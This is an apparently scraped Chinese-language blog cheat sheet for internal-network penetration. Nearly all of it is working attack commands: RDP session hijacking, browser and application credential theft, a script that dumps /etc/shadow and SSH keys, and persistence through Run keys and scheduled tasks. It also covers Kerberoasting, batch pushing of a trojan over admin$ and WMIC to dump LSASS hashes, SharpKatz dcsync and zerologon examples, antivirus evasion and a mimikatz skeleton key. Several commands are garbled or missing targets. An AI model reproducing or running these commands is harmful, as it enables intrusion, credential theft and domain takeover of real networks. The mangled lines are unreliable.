2022-2-10 15:37:22 Author: 1oecho.github.io(查看原文) 阅读量:153 收藏






query user

sc create tide binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#4"      #1为目标会话id和当前会话名

net start tide


1. 浏览器下载记录
2. 浏览器历史记录
3. 浏览器保存的账号密码
4. 浏览器收藏夹标签

# Github项目
https://github.com/GhostPack/Seatbelt # 爬取浏览器收藏夹等机器其他敏感资产

https://github.com/moonD4rk/HackBrowserData # hackbrowserdata 是一个解密浏览器数据(密码|历史记录|Cookies|书签)的导出工具,支持全平台主流浏览器

https://github.com/AlessandroZ/LaZagne #  LaZagne项目是用于开源应用程序获取大量的密码存储在本地计算机上

https://github.com/uknowsec/SharpDecryptPwd # 解密常用软件密码,例如navcat,wincap等




netsh advfirewall show allprofiles


cmdkey /list

reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\servers"



wmic startup get command,caption

REG QUERY HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run


wmic service list brief



wmic product get name,version

rty name,version

powershell "Get-WmiObject -class Win32_Product |Select-Object -Property name,version

# Windows:

findstr /si password  config.*  *.ini *.txt *.properties

dir /a /s /b d:\"*.txt"
dir /a /s /b d:\"*.xml"
dir /a /s /b d:\"*.mdb"
dir /a /s /b d:\"*.sql"
dir /a /s /b d:\"*.mdf"
dir /a /s /b d:\"*.eml"
dir /a /s /b d:\"*.pst"
dir /a /s /b d:\"*conf*"
dir /a /s /b d:\"*bak*"
dir /a /s /b d:\"*pwd*"
dir /a /s /b d:\"*pass*"
dir /a /s /b d:\"*login*"
dir /a /s /b d:\"*user*"

# Linux 
find / -name *.properties
grep -r "查询内容"  文件目录

# by forum.ywhack.com

filename=$(date +%s)'.log'

echo "信息收集"
echo -e "\n" | tee -a $filename
echo "账户信息收集" | tee -a $filename
cat /etc/passwd | tee -a $filename
echo -e "\n" | tee -a $filename
echo "shadow" | tee -a $filename
cat /etc/shadow | tee -a $filename
echo -e "\n" | tee -a $filename
echo "进程信息收集" | tee -a $filename
ps aux | tee -a $filename
echo -e "\n" | tee -a $filename
echo "网络连接" | tee -a $filename
netstat -antlp | tee -a $filename
echo -e "\n" | tee -a $filename
echo "当前用户:" $(whoami) 2>/dev/null | tee -a $filename
echo -e "\n" | tee -a $filename
echo "端口监听" | tee -a $filename
netstat -lnpt | tee -a $filename
echo -e "\n" | tee -a $filename
echo "可登陆用户" | tee -a $filename
cat /etc/passwd | grep -E -v 'nologin$|false' | tee -a $filename
echo -e "\n" | tee -a $filename
echo "增加用户的日志" | tee -a $filename
grep "useradd" /var/log/secure  | tee -a $filename
echo -e "\n" | tee -a $filename
echo "History操作提取" | tee -a $filename
cat ~/.*history | tee -a $filename
echo -e "\n" | tee -a $filename
echo "登录成功的IP" | tee -a $filename
grep "Accepted " /var/log/secure* | awk '{print $11}' | sort | uniq -c | sort -nr | more | tee -a $filename   
echo -e "\n" | tee -a $filename
echo "查看路由表" | tee -a $filename
route -n | tee -a $filename
echo -e "\n" | tee -a $filename
echo "查看 SSH key" | tee -a $filename
if [ -e "${sshkey}" ]; then
    cat ${sshkey} | tee -a $filename
    echo -e "SSH key文件不存在\n" | tee -a $filename
echo -e "\n" | tee -a $filename
echo "查看 known_hosts" | tee -a $filename
cat ~/.ssh/known_hosts | tee -a $filename
echo -e "\n" | tee -a $filename
echo "查找WEB-INF" | tee -a $filename
find / -name *.properties 2>/dev/null | grep WEB-INF | tee -a $filename
echo -e "\n" | tee -a $filename
echo "user|pass|pwd|uname|login|db_" | tee -a $filename
find / -name "*.properties" | xargs egrep -i "user|pass|pwd|uname|login|db_" | tee -a $filename
echo -e "\n" | tee -a $filename
echo "jdbc:|pass=|passwd=" | tee -a $filename
find / -regex ".*\.properties\|.*\.conf\|.*\.config\|.*\.sh" | xargs grep -E "=jdbc:|pass=|passwd=" | tee -a $filename
echo -e "\n" | tee -a $filename
# Author cances
echo "ip和网卡信息" | tee -a $filename
ip a | awk '{print $2,$4}' | tee -a $filename
echo -e "\n" | tee -a $filename
echo "可登陆用户" | tee -a $filename
cat /etc/passwd | grep -E -v 'sync$|halt$|nologin$|false|shutdown' | tee -a $filename
echo -e "\n" | tee -a $filename
echo "用户登陆日志" | tee -a $filename
lastlog | tee -a $filename
echo -e "\n" | tee -a $filename
echo "查看 hosts" | tee -a $filename
cat /etc/hosts | tee -a $filename
echo -e "\n" | tee -a $filename
echo "查看 系统版本" | tee -a $filename
cat /etc/*-release | tee -a $filename
echo -e "\n" | tee -a $filename
echo "查看 内核版本" | tee -a $filename
uname -mrs | tee -a $filename
@echo off

rem 内网存活段自动发现脚本 [Windows]

setlocal enabledelayedexpansion

for /l %%i in (0,1,255) do (
  for /l %%k in (0,1,255) do (
    ping -w 1 -n 1 10.%%i.%%k.1 | findstr "TTL=" >nul || ping -w 1 -n 1 10.%%i.%%k.254 | findstr "TTL=" >nul
    if !errorlevel! equ 0 (echo 10.%%i.%%k.0/24 is alive ! >> alive.txt ) else (echo 10.%%i.%%k.0/24 May be sleeping ! )

for /l %%s in (16,1,31) do (
  for /l %%d in (0,1,255) do (
    ping -n 1 -w 1 172.%%s.%%d.1  | findstr "TTL=" >nul || ping -w 1 -n 1 172.%%s.%%d.254 | findstr "TTL=" >nul
    if !errorlevel! equ 0 (echo 172.%%s.%%d.0/24 is alive ! >> alive.txt ) else (echo 172.%%s.%%d.0/24 May be sleeping ! )

for /l %%t in (0,1,255) do (
  ping -n 1 -w 1 192.168.%%t.1  | findstr "TTL=" >nul || ping -n 1 -w 1 192.168.%%t.254 | findstr "TTL=" >nul
  if !errorlevel! equ 0 (echo 192.168.%%t.0/24 is alive ! >> alive.txt ) else (echo 192.168.%%t.0/24 May be sleeping ! )
REG query "HKLMSOFTWARE\Microsoft\WindowslCurrent Version\Run"
REG ADD "HKLMSOFTWARE\Microsoft\WindowslCurrentVersion\Run"/V"SysDebug"/t REG_SZ/F /D"c:\windows\debug\SysDebug.exe
reg delete "HKLMSOFTWARE\Microsoft\WindowslCurrentVersion\Run"/V"SysDebug"/f
schtasks /create /RL HIGHEST /F /tn "SysDebug" /tr "c:\windows\debug\SysDebug.exe"/sc DAILY /mo 1 /ST 10:05/RU SYSTEM
schtasks /query I findstr "SysDebug"
schtasks /run /tn "SysDebug"
schtasks /delete /F /tn "SysDebug"
schtasks /tn "SysDebug" /query /fo list/v
schtasks /create/F/tn"SysDebug"/tr"D:\用户文档\sixj\ContactslSysDebug.exe"/sc DAILY/mo1/ST10:05
schtasks /query I findstr "SysDebug"
schtasks /run /tn "SysDebug"
schtasks /tn "SysDebug" /query /fo list /v
# 1. 基础的各类文件,关键字定位:

  getFile.exe all # 自研文件查找工具

# 2. 主机安装的软件,确定主机类型:

wmic OS get Caption,CSDVersion,Version,OSArchitecture

# 3. 一把soha,拖回本地分析

Seatable.exe all #

# 4. 重点关注进程中敏感软件,确认是否存在凭证

tasklist /svc | findstr "*Mail*","KeePass"

findstr /c:"userName=" /c:"cpassword="/si Nad\sysvol\xxxx.com\policiesl*.xml

net time/domain&&net view ad&&dir lladNETLOGON&&type llad\NETLOGONchapwd.cmd

powershell Invoke-BloodHound-CollectionMethod All

execate assembly BloodHound.exe
# 通过vbs获取:

cscript GetUserSPN.vbs

# 通过Rubeus获取服务票据Hash,hashcat离线爆破:

Rubues.exe kerberoast

hashcat.exe -m 13100 hash.txt -a 3 -1 ?1?d?s?1?1?1?1?1?1

nbtscan.exe >> smb.txt

2. fscan.exe, 实战也要处理:

fscan.exe -h -m nbtbios -o smb.txt

3. 苛刻环境,正向代理:


4. cme Windows主机探测,实战自行编译免杀处理

cme.exe -t 

tasklist /svc | findstr "cme.exe"

5. SharpNetInfoScan 基于139端口解析:

SharpNetInfoScan.exe -h

6. 基于SPN结果,进行windows探测:

grep 'CN=' spn.txt | awk -F ','{'print $1'} | awk -F '=' {'print$2'} > host.txt
tail -n 30 host.txt
for /f "delims=" %i in host.txt do @ping -w 1 -n 1 %i | findstr /c:".xxx.com|" >> host_res.txt

# Windwos 7 以后都默认自带setspn

setspn T DC-Name Q */* | findstr "MSSQLSvc" # 直接过滤Mssql服务

# 因为得到的spn结果,可能都不存活,我们批量Ping一下,判断存活

awk F "/" {'print $2'} mac.txt | awk F "." {'print $1'} | uniq > res.txt

for /f "delims=" %i in (res.txt) do @ping w 1 n 1 %i | findstr /c:" DC-name " >> PerfLogs news.txt

setspn T dc-name Q */* | findstr "oracle" # 同理过滤“Oracle服务”,其他同类数据库服务也如此
借助 SPN 快速 定位当前目标 域中 所有 存活 的 ldap 服务器:
# 通常情况下,都为域控制器

setspn T dc-name Q */* | findstr "ldap" # 所有 LDAP SPN 的 机器名 都带有典型 的 DC 字样
借助 SPN 快速 定位当前目标 域中 邮件 服务器:
setspn T dc-name Q */* | findstr "exchangeMDB"
setspn T dc-name Q */* | findstr "SMTPSVC"
setspn T dc-name Q */* | findstr "IMAP"c v 
setspn T dc-name Q */* | findstr "POP3"

awk F '/' {'print $2'} mail.txt | awk F '.' {'print $1'} | uniq # 筛选各类主机名

# 批量存活探测

for /f "delims=" %i in (mail.txt) do @ping w 1 n 1 %i | findstr /c:" dc-name " >> mail-re.txt

借助 SPN 快速 定位当前目标 域中 Web 服务器:

setspn T dc-name Q */* | findstr "HTTP"
setspn T dc-name Q */* | findstr "HTTPS"
for /f "delims=" %i in (webs.txt) do @ping w 1 n 1 %i | findstr /c:" dc-name " >> # Web服务

借助 SPN 快速 定位当前 目标 域 中 所有 存活的 DNS 服务器

setspn T dc-name Q */* | findstr "DNS"
for /f "delims=" %i in (dns.txt) do @ping w 1 n 1 %i | findstr /c:" dc-name " >>  dns.txt

借助 SPN 快速 定位当前 目标 域 中 所有 存活的 文件 服务器

setspn T dc-name Q */* | findstr "ftp"
setspn T dc-name Q */* | findstr "nfs"

for /f "delims=" %i in (ftp.txt) do @ping w 1 n 1 %i | findstr /c:" dc-name " >>  dns.txt

借助 SPN 快速 定位当前 目标 域 中 所有 开启远程 连接服务 服务器
setspn T dc-name Q */* | findstr "TERMSRV" >>> PerfLogs rdp .txt
setspn T dc-name Q */* | findstr "WSMAN" >> C: PerfLogs winrm .txt
setspn T dc-name Q */* | findstr "vnc" >> C: PerfLogs vnc .txt
setspn T dc-name Q */* | findstr "vpn" >> C: PerfLogs vpn .txt
setspn T dc-name Q */* | findstr "tnetdgines" >> C: PerfLogs tnetdgines .txt
awk F '/' {'print $2'} **.txt | awk F '.' {'print $1'} | uniq | wc -l
grep 'CN=' spn.txt | awk -F ','{'print $1'} | awk -F '=' {'print $2'} > host_res.txt

# Linux:(筛选重点主机)

egrep -i 'sql|file|vpn|mail|smtp|pop|imap|web|share|monitor|erp|login|oa|print|server|vcenter|vm'

# 准备目标外网各类域名,汇总文件domain.txt

for /f "delims=" %i in (domain.txt) do @ping -w 1 -n 1 %i | findstr /c:"[10." /c:"[192." /c:"[172." >> web-out.txt

# 通过以上的方法获取到大致的C段,批量进行webTitle识别,确定对应段的各类应用:

1. fscan获取WebTitle/指纹

fscan.exe -hf target.txt -nopoc -nop -o title.txt 

2. Ladon

Ladon.exe WhatWeb >> title.txt

3. 苛刻环境,存活探测:

for /l %i in (1,1,255) do @ping 192.168.0.%i -w 1 -n 1 | find /i "ttl"导出成文本: @for /l %i in (1,1,255) do @ping -n 1 -w 40 192.168.0.%i & if errorlevel 1 (echo 192.168.0.%i>>c:\a.txt) else (echo 192.168.0.%i >>c:\b.txt)


1. 批量抓进程,筛选敏感进程,敏感用户,有大概六直接伪造Token实现获取域控权限:

(1) atexec 实现获取进程列表,保存本地,手工筛选

  ## 本机操作:
   atexec.exe ./administrator:[email protected]@ "tasklist"
  ## 被控机操作:
  atexec.exe ./administrator:[email protected]@ "tasklist"
 ## 1. 批量抓,假设用户密码一样,后续筛选重点进程:
 for /f " %i in win2success.txt do atexec.exe ./administrator:[email protected] >> allTasklist.txt

# 筛选重点进程,杀软、数据库、phpstudy、vpn、域管用户(域管理员实际目标名称添加)等等

egrep 'cily|adadmin|adadmin02|xxxx-igrp|leagsoft|shenluyan|xiefp|wulh|sunyingyun|zhangx' process.txt

## 2. 不依赖工具抓,自身tasklist

for /f %i in (ip.txt) do echo %i >> process.txt & tasklist /s %i/u ".\administrator" /p "loecho123.." /V /FO CSV >> process.txt

egrep 'cily|adadmin|adadmin02|xxxx-igrp|leagsoft|shenluyan|xiefp|wulh|sunyingyun|zhangx' process.txt
  1. 批量抓已获取口令主机的Hash、密码:

(抓密码工具一定要免杀,或者你直接把lsass.exe Dump下离线解密也可以)


for /f %i in (ip.txt) do net use N%i\admin$/user:"administrator" "IT1231" & if %errorlevel% equ 0(copy files64.exe \%iladmin$\debug\/Y)& schtasks /create/s"%i"/u "administrator"/p "IT1231" /RL HIGHEST /F/tn"SysDebug"/tr"c:\windows\debug\files64.exe"/sc DAILY/mo1/ST07:25/RUSYSTEM&schtasks/run/tnSysDebug/s"%i"/U "administrator"/P "IT1231"& schtasks/delete/F/tn SysDebug/s"%i"/U"administrator"/P"IT1231"&@ping -n 1 >nul & move W%i\admin$\temp\dumps.logs C:\Users\Public\%i.logs & del W%i\admin$\debug\files64.exe/F&net use N%i\admin$/del

(2) WMIC直接搞

for /f %i in (ip.txt) do net use 11%i\adminS/user:"administrator" "IT1231" & if %errorlevel% equ 0(copy files64.exe ll%i\admin$\debug\/Y) & wmic/NODE:"%i" /user:"administrator" /password:"IT1231" PROCESS call create "c:\windows\debug\files64.exe" & @ping>nul & move N%i\adminS\temp\dumps.logs C:\Users\Publicl%i.logs & del 11%iladminS\debuglfiles64.exe/F net use N%iladmin$/del

(3) 依赖SharpKatz工具,免杀处理:

SharpKatz_x64.exe -h

Example: SharpKatz.exe --Command logonpasswords
Example: SharpKatz.exe --Command ekeys
Example: SharpKatz.exe --Command msv
Example: SharpKatz.exe --Command kerberos
Example: SharpKatz.exe --Command tspkg
Example: SharpKatz.exe --Command credman
Example: SharpKatz.exe --Command wdigest
Example: SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc
Example: SharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc
Example: SharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc
Example: SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash
Example: SharpKatz.exe --Command pth --User username --Domain userdomain --Rc4 rc4key
Example: SharpKatz.exe --Command pth --Luid luid --NtlmHash ntlmhash
Example: SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash --aes128 aes256
Example: SharpKatz.exe --Command zerologon --Mode check --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$
Example: SharpKatz.exe --Command zerologon --Mode exploit --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$
Example: SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --User krbtgt --DomainController WIN-NSE5CPCP07C.testlab2.local
Example: SharpKatz.exe --Command printnightmare --Target dc --Library \\mycontrolled\share\fun.dll
Example: SharpKatz.exe --Command printnightmare --Target dc --Library \\mycontrolled\share\fun.dll --AuthUser user --AuthPassword password --AuthDomain dom
Example: SharpKatz.exe --Command hiveghtmare
Example: SharpKatz.exe --Command dumpsam --System \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM --Sam \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM
Example: SharpKatz.exe --Command listshadows

(4) 各类软件密码解密:

360 安全浏览器
Chrome 解密
Firefox 解密
Flashfxp 解密
Foxmail 邮件客户端解密
IIS 解密
MobaXterm 解密
Navicat 解密
Royal TS 离线解密
SecureCRT 解密
SSMS 客户端解密
Thunderbird 离线解密
TortoiseSVN  解密
VNC 解密
WinSCP 解密
Xshell Xftp 解密

# MySQL数据库:

1. 将目标mysql/data/mysql/user.MYD mysql/data/mysql/user.frm mysql/data/mysql/user.MYI 下载回本地

2. 拖到自己mySQL的对应目录下,修改参数:skip-grant-tables 

3. 连接数据库,查询select host,user,password from user,CMD5查一下对应Hash

# MSSQL数据库:

1. mimikatz"privilege::debug"sekurlsa:pth/user:administrator/domain:./ntlm:hash /run:\"C:\*\SocksCap64\SocksCap64_RunAsAdmin.exel"" "exit"

2. 代理挂进去,通过Windows身份认证直接连接,MSSQL数据库


1、适用于 win7 及以后的系统,win7 和 server 08 默认关闭
2、server 12 之后的版本才默认允许远程任意主机进行管理
3、防火墙未过滤 5985、5986 端口

1. 自带工具:

winrm enumerate winrm/config/listener


Enable-PSRemoting –force


Set-Service WinRM -StartMode Automatic


winrm quickconfig -q


winrm quickconfig -transport:https


winrm get winrm/config


winrm e winrm/config/listener


winrm set winrm/config/service/auth '@{Basic="true"}'

winrm set winrm/config/client/DefaultPorts '@{HTTPS="8888"}'


winrm set winrm/config/service '@{AllowUnencrypted="true"}'


winrm set winrm/config/Client '@{TrustedHosts="192.168.10.*"}'


winrm invoke create wmicimv2/win32_process -SkipCAcheck -skipCNcheck '@{commandline="calc.exe"}'


winrm invoke Create wmicimv2/win32_process @{CommandLine="calc.exe"} -r:dc -u:one\administrator -p:q123456.

winrs -r: -u:administrator -p:[email protected] ipconfig

2. https://github.com/Hackplayers/evil-winrm # 开源工具

3.https://github.com/bohops/WSMan-WinRM # 集合攻击,包括exe、ps1、js等



 Usage: SharpWSManWinRM.exe <hostname> <command>
 Usage: SharpWSManWinRM.exe <hostname> <command> <domain\user> <password>

 Example: SharpWSManWinRM.exe host.domain.local notepad.exe
 Example: SharpWSManWinRM.exe host.domain.local "cmd /c notepad.exe" domain\joe.user [email protected]

 Usage: Invoke-WSManWinRM -hostname <hostname> -command <command>
 Usage: Invoke-WSManWinRM -hostname <hostname> -command <command> -user <domain\user> -password <password>

 Example: import-module .\WSManWinRM.ps1
          Invoke-WSManWinRM -hostname MyServer.domain.local -command calc.exe
 Example: import-module .\WSManWinRM.ps1
          Invoke-WSManWinRM -hostname MyServer.domain.local -command calc.exe -user domain\joe.user -password [email protected]

 Usage: cscript.exe SharpWSManWinRM.vbs <hostname> <command>
 Usage: cscript.exe SharpWSManWinRM.vbs <hostname> <command> <domain\user> <password>

 Example: cscript.exe SharpWSManWinRM.vbs host.domain.local notepad.exe
 Example: cscript.exe SharpWSManWinRM.vbs host.domain.local "cmd /c notepad.exe" domain\joe.user [email protected]

 Usage: cscript.exe SharpWSManWinRM.js <hostname> <command>
 Usage: cscript.exe SharpWSManWinRM.js <hostname> <command> <domain\user> <password>

 Example: cscript.exe SharpWSManWinRM.js host.domain.local notepad.exe
 Example: cscript.exe SharpWSManWinRM.js host.domain.local "cmd /c notepad.exe" domain\joe.user [email protected]

Usage: CppWSManWinRM.exe <hostname> <command>

 Example: CppWSManWinRM.exe host.domain.local notepad.exe
 Note: Username/password option does not work yet

# 汇总以获取到的各类密码,如数据库密码,主机hash解密密码,文件保存密码等等

1. fscan SMB模块探测:

fscan.exe -hf smb.txt -pf pwd.txt -o smb2win.txt

2. crack 弱口令检测:

for /c "delims=" %i in smb.txt do crack.exe -i %i -P pwd.txt -U user.txt >> smb2win.txt

3. 国内目标,代理流畅情况下:

(1) 超级弱口令工具,用代理挂进内网,进行扫描


1. 手工搞,直接执行SysDebug.exe,目标10.10.10.1,用户名:administrator 密码:[email protected] 木马:SysDebug.exe :(只能执行一次)

net use \\\admin$ /user:"administrator" "[email protected]"

copy SysDebug.exe \\\admin$\debug

wmic /NODE:"" /user:"administrator" /password:"[email protected]" PROCESS call create "C:\Windows\Debug\SysDebug.exe"

del \\\admin$\debug\SysDebug.exe /F

net use \\\admin$ /del

2. 远程计划任务

schtasks / create /s "" / u "administrator" / p "[email protected]" / RL HIGHEST /F /tn "SysDebug" /tr c:\windows\debug\SysDebug.exe"/sc DAILY/mo 1/ST 08:25/RU SYSTEM

schtasks /query /s "" /U "administrator" /P "[email protected]" | findstr "SysDebug"

schtasks /run /tn SysDebug /s "" /U " administrator" /P "[email protected]"

schtasks /delete /F /tn SysDebug /s "" /U " administrator" /P "loecho123.."

3. WMIHACKER 进行横向:(https://github.com/rootclay/WMIHACKER/blob/master/README_zh.md)

C:\Users\administrator\Desktop>cscript //nologo WMIHACKER_0.6.vbs

__          ____  __ _____   _    _          _____ _  ________ _____
\ \        / /  \/  |_   _| | |  | |   /\   / ____| |/ /  ____|  __ \
 \ \  /\  / /| \  / | | |   | |__| |  /  \ | |    | ' /| |__  | |__) |
  \ \/  \/ / | |\/| | | |   |  __  | / /\ \| |    |  < |  __| |  _  /
   \  /\  /  | |  | |_| |_  | |  | |/ ____ \ |____| . \| |____| | \ \
    \/  \/   |_|  |_|_____| |_|  |_/_/    \_\_____|_|\_\______|_|  \_\
                              v0.6beta       By. [email protected]
        WMIHACKER.vbs  /cmd  host  user  pass  command GETRES?

        WMIHACKER.vbs  /shell  host  user  pass

        WMIHACKER.vbs  /upload  host  user  pass  localpath remotepath

        WMIHACKER.vbs  /download  host  user  pass  localpath remotepath

          /cmd          single command mode
          host          hostname or IP address
          GETRES?       Res Need Or Not, Use 1 Or 0
          command       the command to run on remote host


> cscript WMIHACKER_0.6.vbs /cmd administrator "Password!" "systeminfo" 1


> cscript WMIHACKER_0.6.vbs /cmd administrator "Password!" "systeminfo > c:\1.txt" 0


> cscript WMIHACKER_0.6.vbs /shell administrator "Password!"


> cscript wmihacker_0.4.vbe /upload administrator "Password!" "c:\windows\system32\calc.exe" "c:\calc"


> cscript wmihacker_0.4.vbe /download administrator "Password!" "c:\calc" "c:\windows\system32\calc.exe"

# 暂时还能过 360, 如卡住多试几次就好, 单纯的远程执行下命令没啥问题
cscript //nologo wmihacker.vbs /cmd administrator "[email protected]#45" "tasklist" 1
cscript //nologo wmihacker.vbs /cmd klion\its "[email protected]#45" "query user" 1

# 由于程序内部还是用批处理在循环取结果, 默认直接调的 cmd.exe 会触发 360 拦截, 取不到结果

WMIcmd.exe -h -u its -p [email protected]#45 -d klion -c "systeminfo" -s 50000
WMIcmd.exe -h -u administrator -p [email protected]#45 -d . -c "systeminfo" -s 50000

# 无法在命令里执行重定向操作, 会触发 360 报警

cscript wmiexec.vbs /cmd .\administrator [email protected]#45 "netstat -ano -wait8000"
cscript wmiexec.vbs /cmd klion\its [email protected]#45 "query user -wait8000"

# IP:   密码: [email protected]

# 仔细划分为三部分:

# ABCD  目标公司名称简称 

# 130	目标系统IP的C段地址

# [email protected]	密码策略问题,加的特殊字符

# 由此可以猜测主机内其他机器管理员密码情况,从而定点横向,从WEB到数据库从数据库到核心。。。。

(2) 通过高权限用户配合高密码进行横向RDP喷射

# 通过注册表查询3389

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections # 查看RDP服务是否开启:1关闭,0开启

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber  # 查看RDP服务的端口

# 通过进程查看

tasklist /svc | find "TermService" # 找到对应服务进程的PID
netstat -ano | find "3220" # 找到进程对应的端口号

# 通过监听端口查看

netstat -ano | findstr LIS # 查看当前监听端口,有些情况可能RDP端口更改


# 注册表开启,高权限用户:

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f  # 监听 3389 端口

# 注册表文件开启,高权限用户:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]

# Wmic启动远程主机RDP服务:

wmic /node: "" /USER:"\administrator" PATH win32_erminalservicesetting WHERE (__Class!="")

2. 国内目标,网络环境稳定:



# 所有用户通用密码,skeleton,重启失效

mimikatz.exe privilege::debug "misc::skeleton"

文章来源: https://1oecho.github.io/GxKPsWfW5/